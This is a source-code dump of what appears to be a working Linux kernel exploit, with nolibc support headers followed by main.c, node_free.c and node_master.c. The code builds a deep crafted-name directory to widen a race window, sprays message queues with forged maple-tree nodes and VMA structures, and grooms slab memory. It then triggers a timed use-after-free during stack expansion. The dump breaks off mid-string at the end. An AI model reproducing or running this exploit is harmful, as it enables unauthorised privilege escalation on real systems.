-------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * Special types used by various syscalls for 
NOLIBC 4 | * Copyright (C) 2017-2021 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_TYPES_H 8 | #define _NOLIBC_TYPES_H 9 | 10 | #include "std.h" 11 | #include <linux/time.h> 12 | 13 | 14 | /* Only the generic macros and types may be defined here. The arch-specific 15 | * ones such as the O_RDONLY and related macros used by fcntl() and open(), or 16 | * the layout of sys_stat_struct must not be defined here. 17 | */ 18 | 19 | /* stat flags (WARNING, octal here) */ 20 | #define S_IFDIR 0040000 21 | #define S_IFCHR 0020000 22 | #define S_IFBLK 0060000 23 | #define S_IFREG 0100000 24 | #define S_IFIFO 0010000 25 | #define S_IFLNK 0120000 26 | #define S_IFSOCK 0140000 27 | #define S_IFMT 0170000 28 | 29 | #define S_ISDIR(mode) (((mode) & S_IFMT) == S_IFDIR) 30 | #define S_ISCHR(mode) (((mode) & S_IFMT) == S_IFCHR) 31 | #define S_ISBLK(mode) (((mode) & S_IFMT) == S_IFBLK) 32 | #define S_ISREG(mode) (((mode) & S_IFMT) == S_IFREG) 33 | #define S_ISFIFO(mode) (((mode) & S_IFMT) == S_IFIFO) 34 | #define S_ISLNK(mode) (((mode) & S_IFMT) == S_IFLNK) 35 | #define S_ISSOCK(mode) (((mode) & S_IFMT) == S_IFSOCK) 36 | 37 | /* dirent types */ 38 | #define DT_UNKNOWN 0x0 39 | #define DT_FIFO 0x1 40 | #define DT_CHR 0x2 41 | #define DT_DIR 0x4 42 | #define DT_BLK 0x6 43 | #define DT_REG 0x8 44 | #define DT_LNK 0xa 45 | #define DT_SOCK 0xc 46 | 47 | /* commonly an fd_set represents 256 FDs */ 48 | #ifndef FD_SETSIZE 49 | #define FD_SETSIZE 256 50 | #endif 51 | 52 | /* PATH_MAX and MAXPATHLEN are often used and found with plenty of different 53 | * values.
54 | */ 55 | #ifndef PATH_MAX 56 | #define PATH_MAX 4096 57 | #endif 58 | 59 | #ifndef MAXPATHLEN 60 | #define MAXPATHLEN (PATH_MAX) 61 | #endif 62 | 63 | /* Special FD used by all the *at functions */ 64 | #ifndef AT_FDCWD 65 | #define AT_FDCWD (-100) 66 | #endif 67 | 68 | /* whence values for lseek() */ 69 | #define SEEK_SET 0 70 | #define SEEK_CUR 1 71 | #define SEEK_END 2 72 | 73 | /* cmd for reboot() */ 74 | #define LINUX_REBOOT_MAGIC1 0xfee1dead 75 | #define LINUX_REBOOT_MAGIC2 0x28121969 76 | #define LINUX_REBOOT_CMD_HALT 0xcdef0123 77 | #define LINUX_REBOOT_CMD_POWER_OFF 0x4321fedc 78 | #define LINUX_REBOOT_CMD_RESTART 0x01234567 79 | #define LINUX_REBOOT_CMD_SW_SUSPEND 0xd000fce2 80 | 81 | /* Macros used on waitpid()'s return status */ 82 | #define WEXITSTATUS(status) (((status) & 0xff00) >> 8) 83 | #define WIFEXITED(status) (((status) & 0x7f) == 0) 84 | 85 | /* waitpid() flags */ 86 | #define WNOHANG 1 87 | 88 | /* standard exit() codes */ 89 | #define EXIT_SUCCESS 0 90 | #define EXIT_FAILURE 1 91 | 92 | #define FD_SETIDXMASK (8 * sizeof(unsigned long)) 93 | #define FD_SETBITMASK (8 * sizeof(unsigned long)-1) 94 | 95 | /* for select() */ 96 | typedef struct { 97 | unsigned long fds[(FD_SETSIZE + FD_SETBITMASK) / FD_SETIDXMASK]; 98 | } fd_set; 99 | 100 | #define FD_CLR(fd, set) do { \ 101 | fd_set *__set = (set); \ 102 | int __fd = (fd); \ 103 | if (__fd >= 0) \ 104 | __set->fds[__fd / FD_SETIDXMASK] &= \ 105 | ~(1UL << (__fd & FD_SETBITMASK)); \ 106 | } while (0) 107 | 108 | #define FD_SET(fd, set) do { \ 109 | fd_set *__set = (set); \ 110 | int __fd = (fd); \ 111 | if (__fd >= 0) \ 112 | __set->fds[__fd / FD_SETIDXMASK] |= \ 113 | 1UL << (__fd & FD_SETBITMASK); \ 114 | } while (0) 115 | 116 | #define FD_ISSET(fd, set) ({ \ 117 | fd_set *__set = (set); \ 118 | int __fd = (fd); \ 119 | int __r = 0; \ 120 | if (__fd >= 0) \ 121 | __r = !!(__set->fds[__fd / FD_SETIDXMASK] & \ 122 | 1UL << (__fd & FD_SETBITMASK)); \ 123 | __r; \ 124 | }) 125 | 126 | #define
FD_ZERO(set) do { \ 127 | fd_set *__set = (set); \ 128 | int __idx; \ 129 | int __size = (FD_SETSIZE+FD_SETBITMASK) / FD_SETIDXMASK;\ 130 | for (__idx = 0; __idx < __size; __idx++) \ 131 | __set->fds[__idx] = 0; \ 132 | } while (0) 133 | 134 | /* for poll() */ 135 | #define POLLIN 0x0001 136 | #define POLLPRI 0x0002 137 | #define POLLOUT 0x0004 138 | #define POLLERR 0x0008 139 | #define POLLHUP 0x0010 140 | #define POLLNVAL 0x0020 141 | 142 | struct pollfd { 143 | int fd; 144 | short int events; 145 | short int revents; 146 | }; 147 | 148 | /* for getdents64() */ 149 | struct linux_dirent64 { 150 | uint64_t d_ino; 151 | int64_t d_off; 152 | unsigned short d_reclen; 153 | unsigned char d_type; 154 | char d_name[]; 155 | }; 156 | 157 | /* needed by wait4() */ 158 | struct rusage { 159 | struct timeval ru_utime; 160 | struct timeval ru_stime; 161 | long ru_maxrss; 162 | long ru_ixrss; 163 | long ru_idrss; 164 | long ru_isrss; 165 | long ru_minflt; 166 | long ru_majflt; 167 | long ru_nswap; 168 | long ru_inblock; 169 | long ru_oublock; 170 | long ru_msgsnd; 171 | long ru_msgrcv; 172 | long ru_nsignals; 173 | long ru_nvcsw; 174 | long ru_nivcsw; 175 | }; 176 | 177 | /* The format of the struct as returned by the libc to the application, which 178 | * significantly differs from the format returned by the stat() syscall flavours. 
179 | */ 180 | struct stat { 181 | dev_t st_dev; /* ID of device containing file */ 182 | ino_t st_ino; /* inode number */ 183 | mode_t st_mode; /* protection */ 184 | nlink_t st_nlink; /* number of hard links */ 185 | uid_t st_uid; /* user ID of owner */ 186 | gid_t st_gid; /* group ID of owner */ 187 | dev_t st_rdev; /* device ID (if special file) */ 188 | off_t st_size; /* total size, in bytes */ 189 | blksize_t st_blksize; /* blocksize for file system I/O */ 190 | blkcnt_t st_blocks; /* number of 512B blocks allocated */ 191 | time_t st_atime; /* time of last access */ 192 | time_t st_mtime; /* time of last modification */ 193 | time_t st_ctime; /* time of last status change */ 194 | }; 195 | 196 | /* WARNING, it only deals with the 4096 first majors and 256 first minors */ 197 | #define makedev(major, minor) ((dev_t)((((major) & 0xfff) << 8) | ((minor) & 0xff))) 198 | #define major(dev) ((unsigned int)(((dev) >> 8) & 0xfff)) 199 | #define minor(dev) ((unsigned int)(((dev) & 0xff))) 200 | 201 | #ifndef offsetof 202 | #define offsetof(TYPE, FIELD) ((size_t) &((TYPE *)0)->FIELD) 203 | #endif 204 | 205 | #ifndef container_of 206 | #define container_of(PTR, TYPE, FIELD) ({ \ 207 | __typeof__(((TYPE *)0)->FIELD) *__FIELD_PTR = (PTR); \ 208 | (TYPE *)((char *) __FIELD_PTR - offsetof(TYPE, FIELD)); \ 209 | }) 210 | #endif 211 | 212 | /* make sure to include all global symbols */ 213 | #include "nolibc.h" 214 | 215 | #endif /* _NOLIBC_TYPES_H */ 216 | -------------------------------------------------------------------------------- /exp/nolibc/unistd.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * unistd function definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_UNISTD_H 8 | #define _NOLIBC_UNISTD_H 9 | 10 | #include "std.h" 11 | #include "arch.h" 12 | #include "types.h" 13 | #include "sys.h" 14 | 15 | 16 | static
__attribute__((unused)) 17 | int msleep(unsigned int msecs) 18 | { 19 | struct timeval my_timeval = { msecs / 1000, (msecs % 1000) * 1000 }; 20 | 21 | if (sys_select(0, 0, 0, 0, &my_timeval) < 0) 22 | return (my_timeval.tv_sec * 1000) + 23 | (my_timeval.tv_usec / 1000) + 24 | !!(my_timeval.tv_usec % 1000); 25 | else 26 | return 0; 27 | } 28 | 29 | static __attribute__((unused)) 30 | unsigned int sleep(unsigned int seconds) 31 | { 32 | struct timeval my_timeval = { seconds, 0 }; 33 | 34 | if (sys_select(0, 0, 0, 0, &my_timeval) < 0) 35 | return my_timeval.tv_sec + !!my_timeval.tv_usec; 36 | else 37 | return 0; 38 | } 39 | 40 | static __attribute__((unused)) 41 | int usleep(unsigned int usecs) 42 | { 43 | struct timeval my_timeval = { usecs / 1000000, usecs % 1000000 }; 44 | 45 | return sys_select(0, 0, 0, 0, &my_timeval); 46 | } 47 | 48 | static __attribute__((unused)) 49 | int tcsetpgrp(int fd, pid_t pid) 50 | { 51 | return ioctl(fd, TIOCSPGRP, &pid); 52 | } 53 | 54 | /* make sure to include all global symbols */ 55 | #include "nolibc.h" 56 | 57 | #endif /* _NOLIBC_UNISTD_H */ 58 | -------------------------------------------------------------------------------- /exp/src/main.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../consts/paging.h" 4 | #include "../consts/prog_regions.h" 5 | #include "../consts/stack.h" 6 | #include "../sysutil/pin_cpu.h" 7 | #include "nodes_decl.h" 8 | 9 | static char node_master_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 10 | 11 | static long __get_stack_ptr(void) 12 | { 13 | register long rsp asm("rsp"); 14 | return rsp; 15 | } 16 | 17 | static int is_stack_switched(void) 18 | { 19 | long stack_ptr; 20 | 21 | stack_ptr = __get_stack_ptr(); 22 | if (stack_ptr <= (long)(node_master_stack + COMMON_STACK_SIZE) && 23 | stack_ptr > (long)node_master_stack) 24 | return 1; 25 | 26 | return 0; 27 | } 28 | 29 | static void 
switch_stack(void) 30 | { 31 | asm volatile("movq %0, %%rsp\n\t" 32 | "call main\n\t" 33 | "movq %%rax, %%rdi\n\t" 34 | "movq $60, %%rax\n\t" /* __NR_exit */ 35 | "syscall\n\t" 36 | "hlt\n\t" 37 | : 38 | : "r"(node_master_stack + COMMON_STACK_SIZE)); 39 | __builtin_unreachable(); 40 | } 41 | 42 | static void unmap_garbage(void) 43 | { 44 | int retval; 45 | 46 | retval = munmap((void *)(TASK_SIZE >> 1), (TASK_SIZE >> 1) - PAGE_SIZE); 47 | if (retval < 0) { 48 | perror(L_ERROR "[-] Cannot clean up unnecessary high maps"); 49 | exit(-1); 50 | } 51 | } 52 | 53 | #define LONG_NAME_FILE_DEPTH 65536 54 | 55 | static const char *RANDOM_FILE_NAME = 56 | "\nfawz\n\ny\n\n\ng\n\n\n\n\n\no\n\nj\nt\nsuro\nfk\njp\nq\n\n\n\n\n" 57 | "lv\n\n\nquhv\nv\nzv\nc\nv\n\n\n\n\n\n\n\nqiq\n\n\nu\nd\n\n\nr\nj\n" 58 | "\n\n\n\n\nerdb\n\n\n\n\n\n\n\n\ny\nv\n\n\n\n\n\n\nn\n\n\n\nf\nt\ny" 59 | "\nz\nae\n\n\n\n\n\n\n\nv\n\na\n\nyo\n\n\n\n\nk\n\no\n\n\nh\nj\n\n" 60 | "\n\nia\n\n\njp\n\n\n\nk\nf\ng\n\n\n\n\n\n\nom\nti\n\n\n\nf\n\nu\n" 61 | "\ng\n\no\ny\np\n\n\nc\nq\n\n\n\ncf\n\np\nt\n\n\n\n\n\n\ni\ng\n\nrd" 62 | "u\nscq\n\netbq\n\n\n\n\n"; 63 | 64 | static int __create_long_name_file(void) 65 | { 66 | int retval; 67 | int depth; 68 | int fd; 69 | 70 | retval = chdir("/tmp"); 71 | if (retval < 0) { 72 | perror(L_ERROR 73 | "[-] Cannot switch the current working directory to /tmp"); 74 | exit(-1); 75 | } 76 | 77 | for (depth = 0; depth < LONG_NAME_FILE_DEPTH; ++depth) { 78 | retval = mkdir(RANDOM_FILE_NAME, 0755); 79 | if (retval < 0) { 80 | perror(L_ERROR 81 | "[-] Cannot create a new directory with the crafted directory name"); 82 | exit(-1); 83 | } 84 | 85 | retval = chdir(RANDOM_FILE_NAME); 86 | if (retval < 0) { 87 | perror(L_ERROR 88 | "[-] Cannot switch the current working directory to the new directory"); 89 | exit(-1); 90 | } 91 | 92 | if (0 == (depth & 4095)) { 93 | fprintf(stderr, 94 | L_DOING 95 | "[ ] Creating a very deep file: %d/%d\n", 96 | depth, LONG_NAME_FILE_DEPTH); 97 | } 98 | } 99
| 100 | fd = open(RANDOM_FILE_NAME, O_RDWR | O_CREAT | O_TRUNC, 0644); 101 | if (fd < 0) { 102 | perror(L_ERROR "[-] Cannot create the deep file"); 103 | exit(-1); 104 | } 105 | 106 | fprintf(stderr, L_DONE "[+] Created the deep file\n"); 107 | 108 | return fd; 109 | } 110 | 111 | static void __fill_long_name_file(int fd) 112 | { 113 | char *buf = __data_start; 114 | long len = __data_end - __data_start; 115 | long retval; 116 | 117 | while (len > 0) { 118 | retval = write(fd, buf, len); 119 | if (retval < 0) { 120 | perror(L_ERROR 121 | "[-] Cannot write the data section to the deep file"); 122 | close(fd); 123 | exit(-1); 124 | } 125 | 126 | len -= retval; buf += retval; /* advance past the bytes already written */ 127 | } 128 | } 129 | 130 | static void __map_long_name_file(int fd) 131 | { 132 | void *addr; 133 | 134 | addr = mmap(__data_start, PAGE_ALIGN(__data_end - __data_start), 135 | PROT_READ | PROT_WRITE, MAP_FILE | MAP_SHARED | MAP_FIXED, 136 | fd, 0); 137 | if (addr == MAP_FAILED) { 138 | perror(L_ERROR 139 | "[-] Cannot remap the data section from the deep file"); 140 | exit(-1); 141 | } 142 | } 143 | 144 | static void map_long_name_file(void) 145 | { 146 | int fd; 147 | 148 | fd = __create_long_name_file(); 149 | 150 | __fill_long_name_file(fd); 151 | 152 | __map_long_name_file(fd); 153 | 154 | close(fd); 155 | } 156 | 157 | static void init_cpu_pinning(void) 158 | { 159 | if (pin_cpu(CPU_0) < 0) { 160 | perror(L_ERROR "[-] Cannot pin to the first CPU"); 161 | exit(-1); 162 | } 163 | } 164 | 165 | int main(void) 166 | { 167 | if (!is_stack_switched()) { 168 | map_long_name_file(); 169 | switch_stack(); 170 | } 171 | 172 | unmap_garbage(); 173 | 174 | init_cpu_pinning(); 175 | return run_node_master(); 176 | } 177 | 178 | #include "node_master.c" 179 | #include "node_free.c" 180 | #include "node_use.c" 181 | -------------------------------------------------------------------------------- /exp/src/node_free.c: -------------------------------------------------------------------------------- 1 | #pragma once 2 |
#include "../nolibc/nolibc.h" 3 | #include "../consts/log.h" 4 | #include "../consts/msg.h" 5 | #include "../consts/stack.h" 6 | #include "../sys/msg.h" 7 | #include "../sysutil/clone.h" 8 | #include "../sysutil/pin_cpu.h" 9 | #include "../sysutil/mbarrier.h" 10 | #include "nodes_decl.h" 11 | #include "nodes_master_free_use.h" 12 | #include "nodes_master_and_free.h" 13 | #include "nodes_free_and_use.h" 14 | #include 15 | 16 | #define MAPLE_MSQNUM 256 17 | #define MAPLE_MSQKEY 8888 18 | #define MAPLE_MSQTYP 1 19 | 20 | static int maple_msqids[MAPLE_MSQNUM]; 21 | 22 | static void __cleanup_maple_msq(int i) 23 | { 24 | int retval; 25 | 26 | retval = msgctl(maple_msqids[i], IPC_RMID, NULL); 27 | if (retval < 0) 28 | perror(L_ERROR "[-] Cannot destroy maple-node message queues"); 29 | } 30 | 31 | static void __cleanup_maple_msqs(void) 32 | { 33 | int i; 34 | 35 | for (i = 0; i < MAPLE_MSQNUM; ++i) 36 | __cleanup_maple_msq(i); 37 | } 38 | 39 | static void cleanup_fildes(void) 40 | { 41 | close(fd_proc_maps); 42 | 43 | __cleanup_maple_msqs(); 44 | } 45 | 46 | static int __open_proc_maps(void) 47 | { 48 | int fd; 49 | 50 | fd = open("/proc/self/maps", O_RDONLY); 51 | if (fd < 0) { 52 | perror(L_ERROR "[-] Cannot open \"/proc/self/maps\""); 53 | return fd; 54 | } 55 | 56 | fd_proc_maps = fd; 57 | 58 | return 0; 59 | } 60 | 61 | static int __open_maple_msq(int i) 62 | { 63 | int retval; 64 | 65 | retval = msgget(MAPLE_MSQKEY + i, IPC_CREAT | 0600); 66 | if (retval < 0) { 67 | perror(L_ERROR 68 | "[-] Cannot create message queues to forge maple nodes"); 69 | return retval; 70 | } 71 | 72 | maple_msqids[i] = retval; 73 | 74 | return 0; 75 | } 76 | 77 | static int __open_maple_msqs(void) 78 | { 79 | int i, retval; 80 | 81 | for (i = 0; i < MAPLE_MSQNUM; ++i) { 82 | retval = __open_maple_msq(i); 83 | if (retval < 0) 84 | goto err; 85 | } 86 | 87 | return 0; 88 | err: 89 | for (--i; i >= 0; --i) 90 | __cleanup_maple_msq(i); 91 | return retval; 92 | } 93 | 94 | static int
open_necessary_files(void) 95 | { 96 | int retval; 97 | 98 | retval = __open_proc_maps(); 99 | if (retval < 0) 100 | return retval; 101 | 102 | retval = __open_maple_msqs(); 103 | if (retval < 0) { 104 | close(fd_proc_maps); 105 | return retval; 106 | } 107 | 108 | return 0; 109 | } 110 | 111 | static char node_use_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 112 | 113 | static pid_t spawn_node_use(void) 114 | { 115 | pid_t pid; 116 | 117 | pid = clone_same_vm(&run_node_use, node_use_stack, COMMON_STACK_SIZE); 118 | if (pid < 0) { 119 | perror(L_ERROR "[-] Cannot create the \"use\" node"); 120 | return pid; 121 | } 122 | 123 | if (pin_cpu2(pid, CPU_1) < 0) 124 | perror(L_ERROR 125 | "[-] Cannot move the \"use\" node to the second CPU"); 126 | 127 | if (waitpid(pid, NULL, __WCLONE | WSTOPPED) < 0) 128 | perror(L_ERROR 129 | "[-] Cannot wait for the \"use\" node to enter the STOPPED state"); 130 | 131 | return pid; 132 | } 133 | 134 | #define MAPLE_RANGE64_SLOTS 16 135 | 136 | #define MA_ROOT_PARENT 1 137 | 138 | struct maple_range_64 { 139 | unsigned long parent; 140 | unsigned long pivot[MAPLE_RANGE64_SLOTS - 1]; 141 | unsigned long slot[MAPLE_RANGE64_SLOTS - 1]; 142 | struct maple_metadata { 143 | unsigned char end; 144 | unsigned char gap; 145 | } meta; 146 | }; 147 | 148 | #define MAPLE_NODE_SIZE 256 149 | _Static_assert(sizeof(struct maple_range_64) == MAPLE_NODE_SIZE, 150 | "Incorrect MAPLE_NODE_SIZE"); 151 | 152 | #define VICTIM_SLOT 10 153 | 154 | static struct maple_range_64 maple_node; 155 | 156 | static void init_maple_nodes(void) 157 | { 158 | maple_node.parent = MA_ROOT_PARENT; 159 | 160 | maple_node.slot[VICTIM_SLOT] = 0xdeadbeef; 161 | maple_node.pivot[VICTIM_SLOT] = ~0UL; 162 | 163 | maple_node.meta.end = VICTIM_SLOT; 164 | } 165 | 166 | static void prepare_maple_nodes(unsigned long addr) 167 | { 168 | maple_node.slot[VICTIM_SLOT] = addr; 169 | } 170 | 171 | static void __send_maple_node(int start, int end) 172 | { 173 | int retval, i; 174 | struct
msg_hdr *hdr; 175 | 176 | hdr = (void *)&maple_node + KERNEL_MSGHDR_SIZE - USERSPACE_MSGHDR_SIZE; 177 | hdr->type = MAPLE_MSQTYP; 178 | 179 | for (i = start; i < end; ++i) { 180 | retval = msgsnd(maple_msqids[i], hdr, 181 | MAPLE_NODE_SIZE - KERNEL_MSGHDR_SIZE, 0); 182 | if (retval < 0) 183 | perror(L_ERROR 184 | "[-] Cannot send evil maple nodes to message queues"); 185 | } 186 | } 187 | 188 | #define PAD_MSQNUM 256 189 | #define UAF_MSQNUM 32 190 | 191 | static void send_pad_maple_nodes(void) 192 | { 193 | __send_maple_node(0, PAD_MSQNUM); 194 | } 195 | 196 | static void send_uaf_maple_nodes(void) 197 | { 198 | __send_maple_node(0, UAF_MSQNUM); 199 | } 200 | 201 | static volatile int uaf_ready_to_go; 202 | 203 | static void wait_uaf_ready(void) 204 | { 205 | while (!uaf_ready_to_go) 206 | asm volatile("pause" : : : "memory"); 207 | 208 | uaf_ready_to_go = 0; 209 | } 210 | 211 | static void __trigger_uaf(void) 212 | { 213 | *(volatile char *)stack_expansion_victim = 'x'; 214 | 215 | send_pad_maple_nodes(); 216 | 217 | synchronize_rcu(); 218 | 219 | send_uaf_maple_nodes(); 220 | } 221 | 222 | static void trigger_uaf(pid_t pid) 223 | { 224 | int retval; 225 | 226 | sched_yield(); 227 | 228 | retval = kill(pid, SIGCONT); 229 | if (retval < 0) { 230 | perror(L_ERROR "[-] Cannot resume the stopped \"use\" node"); 231 | return; 232 | } 233 | 234 | wait_uaf_ready(); 235 | msleep(free_timing_msec); 236 | 237 | __trigger_uaf(); 238 | } 239 | 240 | static int run_node_free(void) 241 | { 242 | pid_t pid; 243 | int retval; 244 | 245 | retval = open_necessary_files(); 246 | if (retval < 0) 247 | return retval; 248 | 249 | init_maple_nodes(); 250 | 251 | prepare_maple_nodes(exploit_address); 252 | 253 | pid = spawn_node_use(); 254 | if (pid < 0) { 255 | cleanup_fildes(); 256 | return pid; 257 | } 258 | 259 | trigger_uaf(pid); 260 | 261 | if (healthcheck_state == HEALTHCHECK_INIT) 262 | ++healthcheck_state; 263 | fputs(L_DOING "[ ] UAF state update: \"free\" has been 
completed\n", 264 | stderr); 265 | 266 | retval = waitpid(pid, NULL, __WCLONE); 267 | if (retval < 0) 268 | perror(L_ERROR 269 | "[-] Cannot wait for the \"use\" node to terminate"); 270 | 271 | cleanup_fildes(); 272 | 273 | return 0; 274 | } 275 | -------------------------------------------------------------------------------- /exp/src/node_master.c: -------------------------------------------------------------------------------- 1 | #include "../nolibc/nolibc.h" 2 | #include "../consts/log.h" 3 | #include "../consts/paging.h" 4 | #include "../consts/stack.h" 5 | #include "../consts/msg.h" 6 | #include "../sys/msg.h" 7 | #include "../sysutil/clone.h" 8 | #include "../sysutil/mbarrier.h" 9 | #include "nodes_decl.h" 10 | #include "nodes_master_free_use.h" 11 | #include "nodes_master_and_free.h" 12 | #include "nodes_master_and_use.h" 13 | #include 14 | 15 | #define ADDR_VICTIM ((void *)0x80000UL) 16 | #define SIZE_VICTIM PAGE_SIZE 17 | 18 | #define ADDR_GAP (ADDR_VICTIM - 1 * PAGE_SIZE) 19 | #define SIZE_GAP PAGE_SIZE 20 | 21 | #define ADDR_GUARD (ADDR_VICTIM - 2 * PAGE_SIZE) 22 | #define SIZE_GUARD PAGE_SIZE 23 | 24 | static int setup_maps(void) 25 | { 26 | void *addr; 27 | 28 | addr = mmap(ADDR_VICTIM, SIZE_VICTIM, PROT_READ | PROT_WRITE, 29 | MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN | 30 | MAP_FIXED_NOREPLACE, 31 | -1, 0); 32 | if (addr == MAP_FAILED) { 33 | perror(L_ERROR 34 | "[-] Cannot map upper pages for stack expansion"); 35 | return -1; 36 | } 37 | 38 | addr = mmap(ADDR_GUARD, SIZE_GUARD, 39 | PROT_READ | PROT_WRITE | MAP_EXECUTABLE, 40 | MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN | 41 | MAP_FIXED_NOREPLACE, 42 | -1, 0); 43 | if (addr == MAP_FAILED) { 44 | perror(L_ERROR 45 | "[-] Cannot map lower pages for stack expansion"); 46 | return -1; 47 | } 48 | 49 | return 0; 50 | } 51 | 52 | static void reset_maps(void) 53 | { 54 | (void)munmap(ADDR_GAP, SIZE_GAP); 55 | } 56 | 57 | #define VMA_MSQNUM 2048 58 | #define VMA_MSQKEY 1234 59 | 60 | static int
vma_msqids[VMA_MSQNUM]; 61 | 62 | static void __cleanup_vma_msq(int i) 63 | { 64 | int retval; 65 | 66 | retval = msgctl(vma_msqids[i], IPC_RMID, NULL); 67 | if (retval < 0) 68 | perror(L_ERROR "[-] Cannot destroy VMA message queues"); 69 | } 70 | 71 | static void cleanup_vma_msq(void) 72 | { 73 | int i; 74 | 75 | for (i = 0; i < VMA_MSQNUM; ++i) 76 | __cleanup_vma_msq(i); 77 | } 78 | 79 | static int __setup_vma_msq(int i) 80 | { 81 | int retval; 82 | 83 | retval = msgget(VMA_MSQKEY + i, IPC_CREAT | 0600); 84 | if (retval < 0) { 85 | perror(L_ERROR 86 | "[-] Cannot create message queues to forge VMA structures"); 87 | return retval; 88 | } 89 | 90 | vma_msqids[i] = retval; 91 | 92 | return 0; 93 | } 94 | 95 | static int setup_vma_msq(void) 96 | { 97 | int i, retval; 98 | 99 | for (i = 0; i < VMA_MSQNUM; ++i) { 100 | retval = __setup_vma_msq(i); 101 | if (retval < 0) 102 | goto err; 103 | } 104 | 105 | return 0; 106 | err: 107 | for (--i; i >= 0; --i) 108 | __cleanup_vma_msq(i); 109 | return retval; 110 | } 111 | 112 | #define VMA_MSQTYP 1 113 | 114 | static char vma_page[PAGE_SIZE]; 115 | 116 | static int __forge_evil_vma(int i) 117 | { 118 | struct msg_hdr *hdr; 119 | int retval; 120 | 121 | hdr = (void *)&vma_page[KERNEL_MSGHDR_SIZE - USERSPACE_MSGHDR_SIZE]; 122 | hdr->type = VMA_MSQTYP; 123 | 124 | retval = msgsnd(vma_msqids[i], hdr, PAGE_SIZE - KERNEL_MSGHDR_SIZE, 0); 125 | if (retval < 0) { 126 | perror(L_ERROR 127 | "[-] Cannot send evil VMA structures to message queues"); 128 | return retval; 129 | } 130 | 131 | return 0; 132 | } 133 | 134 | static int forge_evil_vma(void) 135 | { 136 | int i, retval; 137 | 138 | for (i = 0; i < VMA_MSQNUM; ++i) { 139 | retval = __forge_evil_vma(i); 140 | if (retval < 0) 141 | return retval; 142 | } 143 | 144 | return 0; 145 | } 146 | 147 | #define NODE_NUM 256 148 | 149 | static pid_t nodes[NODE_NUM]; 150 | 151 | static void __kill_node(pid_t pid, int sig) 152 | { 153 | int retval; 154 | 155 | retval = kill(pid, sig); 156 |
if (retval < 0) 157 | perror(L_ERROR "[-] Cannot kill nodes"); 158 | } 159 | 160 | static void kill_node(int i, int sig) 161 | { 162 | pid_t pid = nodes[i]; 163 | 164 | if (!pid) { 165 | fputs(L_ERROR 166 | "Internal error: Trying to kill an invalid node\n", 167 | stderr); 168 | return; 169 | } 170 | 171 | __kill_node(pid, sig); 172 | } 173 | 174 | static void __wait_node(pid_t pid) 175 | { 176 | int retval; 177 | 178 | retval = waitpid(pid, NULL, __WCLONE); 179 | if (retval < 0) 180 | perror(L_ERROR "[-] Cannot wait for nodes"); 181 | } 182 | 183 | static void __clear_node(int i) 184 | { 185 | nodes[i] = 0; 186 | } 187 | 188 | static void wait_node(int i) 189 | { 190 | pid_t pid = nodes[i]; 191 | 192 | if (!pid) { 193 | fputs(L_ERROR 194 | "Internal error: Trying to wait for an invalid node\n", 195 | stderr); 196 | return; 197 | } 198 | 199 | __wait_node(pid); 200 | __clear_node(i); 201 | } 202 | 203 | static void __teardown_node(pid_t pid) 204 | { 205 | __kill_node(pid, SIGKILL); 206 | __wait_node(pid); 207 | } 208 | 209 | static void __teardown_node_at(int i) 210 | { 211 | pid_t pid; 212 | 213 | pid = nodes[i]; 214 | if (pid != 0) { 215 | __teardown_node(pid); 216 | __clear_node(i); 217 | } 218 | } 219 | 220 | static void teardown_nodes(void) 221 | { 222 | int i; 223 | 224 | for (i = 0; i < NODE_NUM; ++i) 225 | __teardown_node_at(i); 226 | } 227 | 228 | static char node_free_stack[COMMON_STACK_SIZE] STACK_ALIGNED; 229 | 230 | static int vma_create_node(int i) 231 | { 232 | pid_t pid; 233 | 234 | pid = clone_new_vm(&run_node_free, node_free_stack, COMMON_STACK_SIZE); 235 | if (pid < 0) { 236 | perror(L_ERROR "[-] Cannot create the \"free\" node"); 237 | return pid; 238 | } 239 | 240 | nodes[i] = pid; 241 | 242 | return 0; 243 | } 244 | 245 | static int setup_nodes(void) 246 | { 247 | int i; 248 | int result; 249 | 250 | for (i = 0; i < NODE_NUM; ++i) { 251 | result = vma_create_node(i); 252 | if (result < 0) 253 | goto err; 254 | } 255 | 256 | return 0; 257 | 
err: 258 | for (--i; i >= 0; --i) 259 | __teardown_node_at(i); 260 | 261 | return result; 262 | } 263 | 264 | #define OBJS_PER_SLAB 16 265 | 266 | static void prepare_fengshui(void) 267 | { 268 | int mod; 269 | int i; 270 | 271 | mod = (NODE_NUM - 1) % OBJS_PER_SLAB; 272 | 273 | for (i = NODE_NUM - 1; i >= 0; --i) { 274 | if (i % OBJS_PER_SLAB == mod) 275 | continue; 276 | 277 | kill_node(i, SIGKILL); 278 | } 279 | 280 | for (i = NODE_NUM - 1; i >= 0; --i) { 281 | if (i % OBJS_PER_SLAB == mod) 282 | continue; 283 | 284 | wait_node(i); 285 | } 286 | } 287 | 288 | #define LUCKY_TASK_ID 223 289 | 290 | static int check_nodes(void) 291 | { 292 | int i; 293 | 294 | for (i = 1; i < NODE_NUM; ++i) { 295 | if (nodes[i] == nodes[i - 1] + 1) 296 | continue; 297 | fprintf(stderr, 298 | L_ERROR 299 | "[-] Spaced PIDs (caused by background services?): " 300 | "[%d] = %d, [%d] = %d\n", 301 | i - 1, nodes[i - 1], i, nodes[i]); 302 | return -1; 303 | } 304 | 305 | return 0; 306 | } 307 | 308 | static int verify_healthcheck_state(void) 309 | { 310 | if (healthcheck_state != HEALTHCHECK_DONE) { 311 | fputs(L_ERROR 312 | "[-] Healthcheck failed: \"Use\" happens before \"free\", " 313 | "please try to enlarge LONG_FILE_NAME_DEPTH\n", 314 | stderr); 315 | return -1; 316 | } 317 | 318 | fputs(L_DONE "[+] Healthcheck passed: \"Use\" happens after \"free\"\n", 319 | stderr); 320 | return 0; 321 | } 322 | 323 | static int warn_healthcheck_state(void) 324 | { 325 | if (healthcheck_state == HEALTHCHECK_DONE) 326 | return 0; 327 | 328 | fputs(L_ERROR 329 | "[-] Healthcheck says \"use\" 